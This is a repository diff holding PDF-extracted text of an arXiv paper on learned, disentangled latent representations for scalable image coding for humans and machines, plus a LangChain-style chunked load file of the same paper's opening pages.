+ been trained to operate across a wide range of bit rates by varying the hyperparameter
348
+ λ ∈ {0.0067, 0.0100, 0.0130, 0.0250, 0.0300, 0.0483} and fixing γ = 0.006 · λ.
349
+ To explore how the overall performance changes with our proposed approach under
350
+ various configurations, we vary the number of channels of the base and enhancement
351
+ latent representations (i.e., M1 and M2, respectively), and the number of hyperprior
352
+ blocks employed (i.e., H). We use the tuple (M1, M2, H) to express each configuration.
353
+ Because our proposed approach is built upon [3] for the sake of reduced com-
354
+ putational load, we have reimplemented [11] on top of a comparable base architec-
355
+ ture with its original configuration (128, 64, 1) in order to ensure a fairer compari-
356
+ son. We also compare with the latest standard codecs in intra-only mode using the
357
+
358
+ 0.1
359
+ 0.2
360
+ 0.3
361
+ 0.4
362
+ 0.5
363
+ 0.6
364
+ 0.7
365
+ 0.8
366
+ 0.9
367
+ 1.0
368
+ 1.1
369
+ Bits per pixel (bpp)
370
+ 51
371
+ 52
372
+ 53
373
+ 54
374
+ mAP@0.5 (%)
375
+ 2% margin (53.85%)
376
+ HEVC
377
+ VVC
378
+ Choi et al. [11] (128, 64, 1)
379
+ Ours (64, 192, 2)
380
+ Ours (64, 128, 2)
381
+ Ours (64, 128, 1)
382
+ Ours (128, 64, 1)
383
+ (a)
384
+ 0.1
385
+ 0.2
386
+ 0.3
387
+ 0.4
388
+ 0.5
389
+ 0.6
390
+ 0.7
391
+ 0.8
392
+ 0.9
393
+ 1.0
394
+ 1.1
395
+ Bits per pixel (bpp)
396
+ 30
397
+ 31
398
+ 32
399
+ 33
400
+ 34
401
+ 35
402
+ 36
403
+ PSNR (RGB)
404
+ (b)
405
+ 0.1
406
+ 0.2
407
+ 0.3
408
+ 0.4
409
+ 0.5
410
+ 0.6
411
+ 0.7
412
+ 0.8
413
+ 0.9
414
+ 1.0
415
+ 1.1
416
+ Bits per pixel (bpp)
417
+ 0.955
418
+ 0.960
419
+ 0.965
420
+ 0.970
421
+ 0.975
422
+ 0.980
423
+ 0.985
424
+ 0.990
425
+ MS-SSIM (RGB)
426
+ (c)
427
+ Figure 4: Performance comparisons across various metrics. (a) Object detection in terms of mAP
428
+ (IoU=0.5) vs. bpp on the COCO 2014 validation dataset. (b) Input reconstruction in terms of
429
+ PSNR vs. bpp and (c) input reconstruction in terms of MS-SSIM vs. bpp on the Kodak dataset.
430
+ reference implementations of HEVC1 and VVC2 over the quantization parameters
431
+ QP ∈ {22, 25, 28, . . . , 40}.
432
+ We evaluate object detection performance on COCO 2014 validation dataset [20]
433
+ consisting of around 5000 JPEG-compressed images with annotated bounding boxes
434
+ belonging to 80 object categories.
435
+ We resize the input images to 512 × 512 with
436
+ a bilinear interpolation filter before encoding. Additionally, we also evaluate input
437
+ reconstruction performance on all 24 images from the Kodak dataset [21].
438
+ 4.2
439
+ Results
440
+ Fig. 4 compares the performance of our models and relevant codecs. Fig. 4(a) shows
441
+ the object detection performance using a rate-accuracy curve in terms of mean average
442
+ precision (mAP) for an Intersection over Union (IoU) threshold of 0.5 versus bits per
443
+ pixel (bpp). Fig. 4(b) and (c) show the input reconstruction performance using rate-
444
+ distortion curves in terms of peak signal-to-noise ratio (PSNR) and MS-SSIM versus
445
+ bpp, respectively.
446
+ For the primary machine vision task, the object detection performance of our
447
+ method with (64, 128, 1) reaches near 2% mAP loss3 (dashed line) at around 0.3
448
+ bpp, whereas Choi et al. [11] with a configuration of (128, 64, 1) reaches a similar
449
+ accuracy at around 0.58 bpp. When repurposed for this compression task, HEVC
450
+ and VVC show relatively poor performance. In comparison with [11], our method
451
+ approximately achieves 55% bit savings at the 2% mAP loss threshold.
452
+ For the secondary input reconstruction task, VVC achieves the best performance
453
+ among all methods for both the PSNR and MS-SSIM metrics. However, our method
454
+ still shows competitive performance at low bpp compared to HEVC and Choi et
455
+ 1http://hevc.hhi.fraunhofer.de/svn/svn_HEVCSoftware/tags/HM-16.20+SCM-8.8/
456
+ 2https://vcgit.hhi.fraunhofer.de/jvet/VVCSoftware_VTM/-/tags/VTM-12.3.
457
+ 3Default performance of YOLOv3 on COCO2014 dataset, including JPEG-compressed images,
458
+ is around 55.85% mAP at 4.80 bpp.
459
+
460
+ 0
461
+ 20
462
+ 40
463
+ 60
464
+ 80
465
+ Epochs
466
+ 0.0
467
+ 0.5
468
+ 1.0
469
+
470
+ Rdn (y1 | y2)
471
+ Ours (64,192,2)
472
+ Choi et al. [11] (128,64,1)
473
+ (a)
474
+ 0
475
+ 20
476
+ 40
477
+ 60
478
+ 80
479
+ Epochs
480
+ 0.0
481
+ 0.5
482
+ 1.0
483
+
484
+ Rdn (y2 | y1)
485
+ (b)
486
+ Figure 5: Evolution during training of the redundancy metrics (a) �
487
+ Rdn (y1 | y2) and (b) �
488
+ Rdn (y2 |
489
+ y1) discussed in Sec. 5. Both curves in all figures correspond to the models trained with λ = 0.0483.
490
+ (a)
491
+ y2
492
+ y1
493
+ y2
494
+ y1
495
+ −40
496
+ −20
497
+ 0
498
+ 20
499
+ 40
500
+ Ours
501
+ [11]
502
+ (b)
503
+ Figure 6: (a) A sample input image from Kodak [21] and (b) top-8 latent channels ordered by rate
504
+ for the base (y1) and enhancement (y2) latent representations of the models employed in Fig. 5.
505
+ al. [11]. Nonetheless, the performance gap between our method for well-chosen con-
506
+ figurations and the benchmarks increases somewhat for larger bpp. The best con-
507
+ figuration for our method in terms of PSNR is with M2 = 192 channels for the
508
+ enhancement layer. When comparing input reconstruction performance using MS-
509
+ SSIM, all tested configurations of our method show competitive performance with
510
+ respect to HEVC. We note that our worst-performing configuration (M2 = 64) in
511
+ terms of PSNR is still competitive when measured with MS-SSIM.
512
+ In summary, our proposed approach is capable of achieving a significant reduction
513
+ in bit rate for the object detection task at the cost of slight performance degradation
514
+ for the input reconstruction task.
515
+ 5
516
+ Insight into Information Flow
517
+ We introduce the redundancy metric Rdn (yi | yj) ≜
518
+ I(yi;yj)
519
+ H(yi)
520
+ = 1 −
521
+ H(yi|yj)
522
+ H(yi) , also
523
+ referred to as the uncertainty coefficient [22] in the literature, which measures what
524
+ portion of the information within yi is redundantly contained in the other variable yj.
525
+ Following the conditional entropy estimation approach employed in [11], we separate
526
+ yi and yj into fibers with a size of m × 1 × 1, where m ∈ {Mi, Mj} is the number
527
+ of channels of the respective latent tensor. Then, we group the fibers for yj into
528
+ K = 128 clusters using the k-means algorithm. Finally, we estimate
529
+
530
+ Rdn (yi | yj) = 1 −
531
+ 1
532
+ H(yi)
533
+
534
+ k∈{1,...,K}
535
+ p(k) H(¯yi | c(¯yj) = k),
536
+ (3)
537
+ where c : RMj×1×1 → {1, . . . , K} is a fixed clustering function, p(k) denotes the ap-
538
+ proximate probability density associated with each cluster k, and (¯yi, ¯yj) is a random
539
+
540
+ H11Hvariable representing one of L pairs of fibers sampled over 256 images. To estimate
541
+ H(yi), we employ the entropy bottleneck module of [3], and also use it in computing
542
+ the estimate H(¯yi | c(¯yj) = k) ≈ �
543
+ l∈{1,...,L} H(¯y(l)
544
+ i ) δ[c(¯y(l)
545
+ j ) − k].
546
+ We compare the evolution of the aforementioned metric during training for our
547
+ method and for the benchmark model [11]. As Fig. 5(a) shows, �
548
+ Rdn (y1 | y2) sta-
549
+ bilizes near the desired value of zero for our method, whereas it is larger for [11].
550
+ Conversely, as Fig. 5(b) shows, �
551
+ Rdn (y2 | y1) stabilizes near one for our method,
552
+ and zero for [11]. This confirms that our proposed approach yields a more compact
553
+ base latent representation, while producing a suboptimal enhancement latent repre-
554
+ sentation. Furthermore, it affirms that the model from [11] offers a more graceful
555
+ degradation in the context of image reconstruction quality as its enhancement latent
556
+ representation contains less redundancy compared to ours. Although the loss in cod-
557
+ ing efficiency due to scalability has been previously studied in [11], we argue that our
558
+ way of looking into information flow through an information-theoretic lens provides
559
+ deeper understanding about degree of redundancy between the latent representations.
560
+ Fig. 6 visualizes the top-8 channels, ordered by rate, of the base and enhancement
561
+ latent representations for both our method and the one in [11]. For our approach,
562
+ y1 contains very little visible image structure, suggesting that it is well optimized for
563
+ the object detection task. Without achieving comparative gains in task accuracy, as
564
+ seen in Fig. 4, [11] produces significant visible image structure within y1, leading to
565
+ a significantly higher bit cost for the base bitstream. Thus, our method efficiently
566
+ encodes only what is necessary for a given task within its respective bitstream.
567
+ 6
568
+ Conclusion
569
+ This paper presents a DNN-based image codec with a new variational formulation,
570
+ offering latent-space scalability for human and machine vision tasks by disentangling
571
+ the learned latent representations. For this end, the information related to the object
572
+ detection task is extracted at the encoder side to be used as an additional input,
573
+ together with original input image, to a learned transform at the encoder. As such,
574
+ compared to the state-of-the-art benchmark in [11], we achieve significant bit re-
575
+ ductions at the base layer bitstream for the object detection task, hence yielding a
576
+ desirable scalable image codec for the VCM paradigm. Additionally, we introduce an
577
+ information-theoretic metric to analyze the characteristics of the amount of redun-
578
+ dancy between two learned latent representations. We leave the investigation of how
579
+ to further improve image reconstruction quality while not compromising the object
580
+ detection performance for future work.
581
+ References
582
+ [1] “Cisco
583
+ annual
584
+ internet
585
+ report
586
+ (2018-2023)
587
+ White
588
+ paper,”
589
+ https://www.
590
+ cisco.com/c/en/us/solutions/collateral/executive-perspectives/
591
+ annual-internet-report/white-paper-c11-741490.html.
592
+ [2] Int. Standards Org./Int/Electrotech. Commun., “Call for Proposals on Video Coding
593
+ for Machines,” ISO/IEC JTC 1/SC 29/WG 2/N220, July 2022.
594
+
595
+ [3] J. Ball´e, D. Minnen, S. Singh, S. J. Hwang, and N. Johnston,
596
+ “Variational image
597
+ compression with a scale hyperprior,” in Proc. ICLR, 2018.
598
+ [4] Z. Cheng, H. Sun, M. Takeuchi, and J. Katto,
599
+ “Learned image compression with
600
+ discretized gaussian mixture likelihoods and attention modules,” in Proc. IEEE CVPR,
601
+ 2020.
602
+ [5] C. Christopoulos, A. Skodras, and T. Ebrahimi, “The JPEG2000 still image coding
603
+ system: An overview,” IEEE Trans. Consum. Electron., vol. 46, no. 4, pp. 1103–1127,
604
+ 2000.
605
+ [6] Int. Telecommun. Union-Telecommun. and Int. Standards Org./Int/Electrotech. Com-
606
+ mun., “High efficiency video coding,” Rec. ITU-T H.265 and ISO/IEC 23008-2, 2019.
607
+ [7] Z. Wang, E. Simoncelli, and A. Bovik,
608
+ “Multiscale structural similarity for image
609
+ quality assessment,” in Proc. Asilomar Conf. Signals, Systems, and Computers, 2003.
610
+ [8] R. Torfason, F. Mentzer, E. Agustsson, M. Tschannen, R. Timofte, and L. Van Gool,
611
+ “Towards image understanding from deep compression without decoding,”
612
+ arXiv
613
+ preprint arXiv:1803.06131, 2018.
614
+ [9] L. D. Chamain, F. Racap´e, J. B´egaint, A. Pushparaja, and S. Feltman, “End-to-end
615
+ optimized image compression for machines, a study,” in Proc. IEEE DCC, 2021, pp.
616
+ 163–172.
617
+ [10] N. Yan, C. Gao, D. Liu, H. Li, L. Li, and F. Wu, “SSSIC: semantics-to-signal scalable
618
+ image coding with learned structural representations,” IEEE Trans. Image Processing,
619
+ vol. 30, pp. 8939–8954, 2021.
620
+ [11] H. Choi and I. V. Baji´c, “Scalable image coding for humans and machines,” IEEE
621
+ Trans. Image Processing, vol. 31, pp. 2739–2754, 2022.
622
+ [12] T. M. Cover and J. A. Thomas, Elements of Information Theory, Wiley, 2nd edition,
623
+ 2006.
624
+ [13] M. I. Belghazi, A. Baratin, S. Rajeswar, S. Ozair, Y. Bengio, A. Courville, and
625
+ R. D. Hjelm,
626
+ “MINE: Mutual information neural estimation,”
627
+ arXiv preprint
628
+ arXiv:1801.04062, 2018.
629
+ [14] D. P. Kingma and M. Welling,
630
+ “Auto-encoding variational bayes,” arXiv preprint
631
+ arXiv:1312.6114, 2013.
632
+ [15] J. Ball´e, V. Laparra, and E. P. Simoncelli, “End-to-end optimized image compression,”
633
+ in Proc. ICLR, 2017.
634
+ [16] J. Redmon and A. Farhadi, “YOLOv3: An incremental improvement,” arXiv preprint
635
+ arXiv:1804.02767, 2018.
636
+ [17] J. Ball´e, V. Laparra, and E. P. Simoncelli,
637
+ “Density modeling of images using a
638
+ generalized normalization transformation,” in Proc. ICLR, 2016.
639
+ [18] J. B´egaint, F. Racap´e, S. Feltman, and A. Pushparaja,
640
+ “CompressAI: A PyTorch
641
+ library and evaluation platform for end-to-end compression research,” arXiv preprint
642
+ arXiv:2011.03029, 2020.
643
+ [19] T. Xue, B. Chen, J. Wu, D. Wei, and W. T. Freeman,
644
+ “Video enhancement with
645
+ task-oriented flow,” Int. J. Comput. Vis., vol. 127, no. 8, pp. 1106–1125, Feb. 2019.
646
+ [20] T.-Y. Lin, M. Maire, S. Belongie, L. Bourdev, R. Girshick, J. Hays, P. Perona, D. Ra-
647
+ manan, C. L. Zitnick, and P. Doll´ar, “Microsoft COCO: Common objects in context,”
648
+ 2014.
649
+ [21] E. Kodak, “Kodak lossless true color image suite (PhotoCD PCD0992),” http://r0k.
650
+ us/graphics/kodak.
651
+ [22] H. Theil, Statistical decomposition analysis: With applications in the social and ad-
652
+ ministrative sciences, North-Holland Publishing Company, 1972.
653
+
0dE2T4oBgHgl3EQf4wg0/content/tmp_files/load_file.txt ADDED
@@ -0,0 +1,469 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ filepath=/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf,len=468
2
+ page_content='Learned Disentangled Latent Representations for Scalable Image Coding for Humans and Machines Ezgi ¨Ozyılkan1,†,∗, Mateen Ulhaq1,‡,∗, Hyomin Choi∗, and Fabien Racap´e∗ †Dept.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
3
+ page_content=' of Electrical and Computer Engineering, New York University ‡School of Engineering Science, Simon Fraser University ∗ InterDigital - Emerging Technologies Lab eo2135@nyu.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
4
+ page_content='edu, mulhaq@sfu.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
5
+ page_content='ca, {hyomin.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
6
+ page_content='choi, fabien.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
7
+ page_content='racape}@interdigital.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
8
+ page_content='com Abstract As an increasing amount of image and video content will be analyzed by machines, there is demand for a new codec paradigm that is capable of compressing visual input primarily for the purpose of computer vision inference, while secondarily supporting input reconstruction.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
9
+ page_content=' In this work, we propose a learned compression architecture that can be used to build such a codec.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
10
+ page_content=' We introduce a novel variational formulation that explicitly takes feature data relevant to the desired inference task as input at the encoder side.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
11
+ page_content=' As such, our learned scalable image codec encodes and transmits two disentangled latent representations for object detection and input reconstruction.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
12
+ page_content=' We note that compared to relevant benchmarks, our proposed scheme yields a more compact latent representation that is specialized for the inference task.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
13
+ page_content=' Our experiments show that our proposed system achieves a bit rate savings of 40.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
14
+ page_content='6% on the primary object detection task compared to the current state-of-the-art, albeit with some degradation in performance for the secondary input reconstruction task.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
15
+ page_content=' 1 Introduction It is projected that an increasing amount of captured visual content will be ana- lyzed by machines in order to conduct vision analytics (e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
16
+ page_content='g.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
17
+ page_content=', object detection, image classification, segmentation), instead of being solely viewed by humans [1].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
18
+ page_content=' Since re- cent advances in artificial intelligence using deep neural networks (DNNs) necessitate heavy computational resource usage, such machine analytics tasks may need to be offloaded to a remote server.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
19
+ page_content=' For example, low-end devices on the Internet of Things (IoT) record a significant amount of visual content that needs to be transmitted to a remote server to be analyzed and/or stored.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
20
+ page_content=' To address the heavy communication re- quirements of such systems, new compression schemes and standards activities such as MPEG Video Coding for Machines (VCM) [2] have emerged, and have become attractive areas of research in recent years.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
21
+ page_content=' At the same time, DNN-aided data-driven image compression algorithms [3, 4] have attracted considerable research interest as they outperform the rate-distortion (RD) performance of off-the-shelf image codecs such as JPEG2000 [5] and HEVC Intra coding [6] across various experimental setups.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
22
+ page_content=' Such DNN-based compression approaches are typically optimized for mean squared error (MSE) and/or multi-scale 1Contributed equally to this work.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
23
+ page_content=' This work was done while E.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
24
+ page_content=' ¨Ozyılkan and M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
25
+ page_content=' Ulhaq were interns at InterDigital.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
26
+ page_content=' arXiv:2301.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
27
+ page_content='04183v1 [eess.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
28
+ page_content='IV] 10 Jan 2023 (a) (b) (c) Figure 1: Various methods to separate information into task-relevant data for multiple tasks in a scalable manner.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
29
+ page_content=' The data separation is achieved by (a) generating feature data s alongside a residual r = x− ˜x which encodes the error in the decoder-side reconstruction ˜x of the original input x, (b) transforming x with a single learned encoder, and (c) transforming x and s with two learned encoders into two latent representations {y1, y2}.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
30
+ page_content=' Dotted lines denote the decoder operations.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
31
+ page_content=' structural similarity index (MS-SSIM) [7], which are used as distortion metrics be- tween the original and reconstructed images within the loss function.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
32
+ page_content=' Moreover, in the case of DNN-based compression models targeting a machine vision task, the dis- tortion metric is simply replaced with a task-specific loss, as in [8,9].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
33
+ page_content=' More recently, the studies in [10, 11] present DNN-based scalable compression frameworks that si- multaneously support multiple tasks through scalable bitstreams sent to the decoder.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
34
+ page_content=' For example, in [11], the base layer bitstream is transmitted to the decoder for the ob- ject detection task, and the enhancement layer bitstream is additionally transmitted only when the reconstruction of input images is required.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
35
+ page_content=' To optimize the compres- sion performance of such a scalable system, the compression model must learn how to separate the information into different parts necessary for each task without any significant overlap.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
36
+ page_content=' In this work, we propose a two-task scalable image codec with a new variational formulation alternative to the current state-of-the-art proposed in [11].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
37
+ page_content=' Our scalable codec provides a base layer supporting a machine vision task, with significant gains in RD-performance compared to relevant benchmarks, and an enhancement layer supporting an input reconstruction task.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
38
+ page_content=' In Section 2, we briefly summarize the most relevant prior work.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
39
+ page_content=' Our proposed method is then described in detail in Section 3, followed by comprehensive experimental results with various configurations of our model detailed in Section 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
40
+ page_content=' Furthermore, in Section 5, we present an in-depth comparison of our model with the most relevant benchmark from an information- theoretic perspective.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
41
+ page_content=' Finally, in Section 6 we conclude on the analyzed approaches and suggest possible future research directions.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
42
+ page_content=' 2 Related Work Different approaches have been explored in the literature in order to build codecs that separate the information into multiple parts associated with corresponding end tasks, some of which are shown in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
43
+ page_content=' 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
44
+ page_content=' For example, Yan et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
45
+ page_content=' [10] adopts a scheme shown in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
46
+ page_content=' 1(a) in which the feature representation s, designated for a vision task, is extracted from the input x with a learned transform, in order to be consecutively compressed and transmitted to the decoder.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
47
+ page_content=' Therefore, at the decoder, s is used as an input to a computer vision network.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
48
+ page_content=' Additionally, an estimate of the input ˜x can be r ry2 → S y1- y2 y1 SFigure 2: VAE-style compression model for our proposed method with latent-space scalability.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
49
+ page_content=' determined from s using an auxiliary module.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
50
+ page_content=' Using this estimate, an encoder may also compress and transmit a residual r = x− ˜x.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
51
+ page_content=' At the decoder side, r may be used in conjunction with the previously transmitted s in order to reconstruct the input x.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
52
+ page_content=' However, in this scheme, the optimality of r with respect to the image reconstruction task depends on how well ˜x can be reconstructed from the feature representation s.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
53
+ page_content=' Choi et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
54
+ page_content=' [11] introduce a latent-space scalable codec based on the Cheng et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
55
+ page_content=' [4] architecture.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
56
+ page_content=' As shown in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
57
+ page_content=' 1(b), a single learned transform in the encoder maps the input x into a latent space consisting of two learned latent representations y1 and y2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
58
+ page_content=' To carry out the machine vision task at the decoder side, y1 is subse- quently fed into another learned transform, referred to as latent-space transform, in order to obtain an estimate of s, which will be used as an input to a computer vision network.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
59
+ page_content=' For the input reconstruction task, both latent representations y1 and y2 are concatenated and used as input to a pixel reconstruction decoder.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
60
+ page_content=' In order to ensure that there is no loss in compression efficiency when coding y1 and y2 separately, the aforementioned latent representations should be maximally independent of one an- other.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
61
